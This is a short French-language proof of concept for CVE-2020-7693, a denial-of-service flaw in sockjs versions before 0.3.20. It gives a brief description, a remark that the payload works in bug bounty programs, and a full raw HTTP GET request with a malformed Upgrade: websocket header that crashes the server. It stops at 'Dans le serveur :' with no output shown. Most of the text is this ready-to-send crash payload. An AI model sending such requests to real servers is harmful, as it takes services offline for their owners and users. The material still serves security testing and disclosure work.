CVE-2020-7693 PoC
Note : Je confirme que la charge utile pour CVE-2020-7693 peut être exécutée dans un programme de Bug Bounty
Description :
- Une gestion incorrecte de l'en-tête Upgrade avec la valeur websocket entraîne un crash des conteneurs hébergeant des applications sockjs. Cela affecte le package sockjs avant la version 0.3.20.
Une seule requête fait planter le serveur via un sockjs-node obsolète :
GET /sockjs-node/000/ HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: Upgrade
Upgrade: websocket
Cache-Control: no-cache
Connection: close
\r\n (delete-this)
\r\n (delete-this)
Dans le serveur :
